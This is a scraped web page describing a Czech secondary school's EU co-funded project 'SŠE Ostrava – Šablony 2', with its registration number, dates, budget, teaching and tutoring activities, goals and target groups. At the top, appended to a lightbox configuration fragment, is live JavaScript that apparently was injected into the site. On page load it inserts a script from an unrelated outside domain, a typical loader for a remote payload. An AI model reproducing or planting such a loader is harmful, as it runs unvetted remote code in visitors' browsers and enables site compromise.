, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

SŠE OSTRAVA – ŠABLONY 2

Název projektu:SŠE Ostrava – Šablony 2
Registrační číslo projektu:CZ.02.3.68/0.0/0.0/16_035/0007981
Zkrácený název projektu:SŠE Ostrava – Šablony 2
Název projektu anglicky:SŠE Ostrava – Templates 2
Datum zahájení projektu:1. 11. 2017
Předpokládané datum ukončení projektu:31. 10. 2019
Celkové způsobilé náklady projektu:1 179 344,00 Kč
Aktivity projektu:III/1.5 Koordinátor spolupráce školy a zaměstnavatele – personální podpora SŠ

III/1.6 Školní kariérový poradce – personální podpora SŠ

III/2.1 j Vzdělávání pedagogických pracovníků SŠ – DVPP v rozsahu 8 hodin – Polytechnické vzdělávání

III/2.11 CLIL ve výuce na SŠ

III/2.13 b Vzájemná spolupráce pedagogů SŠ – Matematická gramotnost

III/2.13 j Vzájemná spolupráce pedagogů SŠ – Polytechnické vzdělávání

III/2.5 c Vzdělávání pedagogických pracovníků SŠ – DVPP v rozsahu 80 hodin – Cizí jazyky

III/2.7 Sdílení zkušeností pedagogů z různých škol prostřednictvím vzájemných návštěv (pro SŠ)

III/2.9 Tandemová výuka na SŠ

III/4.1 Doučování žáků SŠ ohrožených školním neúspěchem

Cíle projektu:Zlepšení kvality vzdělávání a výsledků žáků v klíčových kompetencích.

Zvýšení kvality vzdělávání a odborné přípravy včetně posílení jejich relevance pro trh práce

Cílová skupina:Pedagogičtí pracovníci středních škol včetně vedoucích pedagogických pracovníků

Žáci

Projekt SŠE Ostrava – Šablony 2 je spolufinancován Evropskou unií.